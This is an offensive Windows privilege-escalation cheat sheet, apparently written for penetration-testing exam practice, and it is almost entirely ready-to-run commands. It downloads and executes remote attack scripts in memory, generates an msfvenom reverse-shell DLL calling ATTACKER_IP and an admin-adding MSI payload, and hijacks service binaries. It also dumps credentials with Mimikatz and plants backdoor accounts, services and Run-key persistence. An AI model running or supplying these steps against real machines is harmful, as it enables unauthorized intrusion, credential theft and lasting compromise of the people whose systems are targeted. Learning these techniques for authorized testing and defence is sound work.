Windows Privilege Escalation

Phase 1: System Information Gathering

Basic System Info

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
whoami /all
net user
net localgroup
net localgroup administrators
hostname
ipconfig /all

Current User Privileges

whoami /priv
whoami /groups
net user %username%

Phase 2: Automated Enumeration

WinPEAS (Primary Tool)

# Download and run WinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASx64.exe -o winPEAS.exe
.\winPEAS.exe | Tee-Object -FilePath "winpeas_output.txt"

# Alternative: PowerShell version
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')

PowerUp.ps1 (Alternative)

# Download and run PowerUp
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1')
Invoke-AllChecks

# Or copy from Kali
cp /usr/share/powershell-empire/empire/server/data/module_source/privesc/PowerUp.ps1 .

Windows Exploit Suggester

# Run systeminfo and save output
systeminfo > systeminfo.txt

# On Kali, run exploit suggester
python3 /opt/wesng/wes.py systeminfo.txt

Phase 3: Service Enumeration & Exploitation

Service Permissions

# List all services
sc query state= all

# Check service permissions
icacls "C:\Program Files\Service\service.exe"

# Find services with weak permissions
Get-Acl -Path "HKLM:\SYSTEM\CurrentControlSet\Services\*" | Format-Table

# PowerShell service enumeration
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}

Unquoted Service Paths

# Find unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

# PowerShell method
Get-WmiObject -Class Win32_Service | Where-Object {$_.PathName -notlike '*"*' -and $_.PathName -like '* *'} | Select-Object Name, PathName, StartMode

Service Binary Hijacking

# If service binary is writable
icacls "C:\Program Files\Service\service.exe"

# Replace with malicious binary
copy evil.exe "C:\Program Files\Service\service.exe"

# Restart service
net stop ServiceName
net start ServiceName

Phase 4: Registry Exploitation

AlwaysInstallElevated

# Check if AlwaysInstallElevated is enabled
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# If both return 0x1, create MSI payload
msfvenom -p windows/adduser USER=hacker PASS=password123 -f msi > evil.msi
msiexec /quiet /qn /i evil.msi

Registry AutoRuns

# Check startup programs
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

# Check for writable startup locations
icacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

Phase 5: Scheduled Tasks & Processes

Scheduled Tasks

# List scheduled tasks
schtasks /query /fo LIST /v

# Check for writable task binaries
schtasks /query /fo LIST /v | findstr /B /C:"Task To Run"

# PowerShell method
Get-ScheduledTask | Where-Object {$_.State -eq "Ready"} | Select-Object TaskName,TaskPath

Process Monitoring

# Monitor processes for credentials
Get-WmiObject Win32_Process | Select-Object ProcessId,Name,CommandLine

# Use ProcessMonitor (ProcMon) for detailed analysis

Phase 6: DLL Hijacking

DLL Search Order

# Check for missing DLLs
# 1. Application directory
# 2. System32
# 3. System
# 4. Windows directory
# 5. Current directory
# 6. PATH directories

# Find processes loading DLLs from writable directories

DLL Hijacking Exploitation

# Create malicious DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f dll > evil.dll

# Place in writable location in DLL search path
copy evil.dll "C:\Writable\Path\missing.dll"

Phase 7: Token Impersonation

SeImpersonatePrivilege Abuse

# Check for SeImpersonate or SeAssignPrimaryToken
whoami /priv

# If present, use JuicyPotato, PrintSpoofer, or RoguePotato

Token Impersonation Tools (Preferred Methods)

# SweetPotato (Recommended - works on most systems)
.\SweetPotato.exe -p c:\windows\system32\cmd.exe -a "/c whoami"

# PrintSpoofer (For Windows Server 2016/2019)
.\PrintSpoofer64.exe -i -c cmd

# JuicyPotato (For older versions)
.\JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c whoami > C:\temp\output.txt" -t *

Phase 8: Credential Hunting

Password Files & History

# Search for password files
dir /s *password*
dir /s *cred*
dir /s *vnc*
dir /s *.config

# PowerShell credential hunting
Get-ChildItem -Path C:\ -Include *password*,*cred*,*vnc* -Recurse -Force -ErrorAction SilentlyContinue

PowerShell History

# Check PowerShell history
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

# All users' PowerShell history
Get-ChildItem -Path C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ -Name ConsoleHost_history.txt -Recurse

Registry Credentials

# VNC passwords
reg query HKLM\SOFTWARE\RealVNC\WinVNC4 /v password
reg query HKLM\SOFTWARE\TightVNC\Server

# Auto-login credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

# Saved credentials
cmdkey /list

Memory Credential Extraction

# Mimikatz one-liners (requires SYSTEM/admin privileges)
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
.\mimikatz.exe "privilege::debug" "sekurlsa::wdigest" "exit"
.\mimikatz.exe "privilege::debug" "sekurlsa::msv" "exit"

# Extract cached credentials
.\mimikatz.exe "privilege::debug" "lsadump::cache" "exit"

# Dump SAM hashes
.\mimikatz.exe "privilege::debug" "lsadump::sam" "exit"

# PowerShell version (if available)
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"'

Phase 9: Windows Exploits

Common Windows CVEs

# Check Windows version and patch level
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"Hotfix"

# Common exploits to check:
# MS16-032 (Secondary Logon Handle)
# MS17-010 (EternalBlue)
# CVE-2020-0796 (SMBGhost)
# CVE-2021-1675 (PrintNightmare)

Kernel Exploits

# Only use as last resort
# Check exploit-db for Windows version specific exploits

Phase 10: Active Directory Privilege Escalation

PowerView.ps1

# Download PowerView
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')

# Basic AD enumeration
Get-Domain
Get-DomainUser
Get-DomainGroup
Get-DomainComputer

BloodHound Data Collection

# Using SharpHound
.\SharpHound.exe -c All

# Using bloodhound-python (from attacker machine)
bloodhound-python -d domain.local -u username -p password -gc DC_IP -c all

Phase 11: Post-Exploitation & Persistence

Add User to Administrators

net user hacker password123 /add
net localgroup administrators hacker /add

Create Service Backdoor

sc create evil binpath= "cmd.exe /c net user hacker password123 /add && net localgroup administrators hacker /add"
sc start evil

Registry Persistence

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v evil /t REG_SZ /d "C:\temp\backdoor.exe"

Common Windows Privilege Escalation Vectors

High Priority Checks

1. AlwaysInstallElevated registry keys
2. Unquoted service paths with write permissions
3. Service binary permissions (writable executables)
4. SeImpersonatePrivilege for token impersonation
5. Scheduled tasks running as SYSTEM
6. DLL hijacking opportunities
7. Stored credentials in registry/files

Medium Priority Checks

1. Weak service permissions
2. Registry autoruns with write access
3. Group Policy preferences passwords
4. PowerShell history files
5. Configuration files with credentials

Tools & Scripts

PowerShell Tools

PowerUp.ps1         - Privilege escalation enumeration
PowerView.ps1       - Active Directory enumeration
Sherlock.ps1        - Exploit suggester
Invoke-Mimikatz.ps1 - Credential dumping

Compiled Tools

WinPEAS.exe         - Comprehensive enumeration
SweetPotato.exe     - Token impersonation (preferred)
PrintSpoofer.exe    - Token impersonation (newer Windows)
JuicyPotato.exe     - Token impersonation (older Windows)
Mimikatz.exe        - Credential extraction

Next Steps

1. Run automated tools first (WinPEAS, PowerUp)
2. Focus on high-impact vectors (services, tokens, registry)
3. Hunt for credentials systematically
4. Test kernel exploits only as last resort
5. Establish persistence once elevated

Resources

• PowerSploit Framework
• PEASS-ng WinPEAS
• HackTricks Windows PrivEsc
• PayloadsAllTheThings Windows
• LOLBAS Project
• OSCP Secret Sauce - eins.li - SweetPotato, Mimikatz one-liners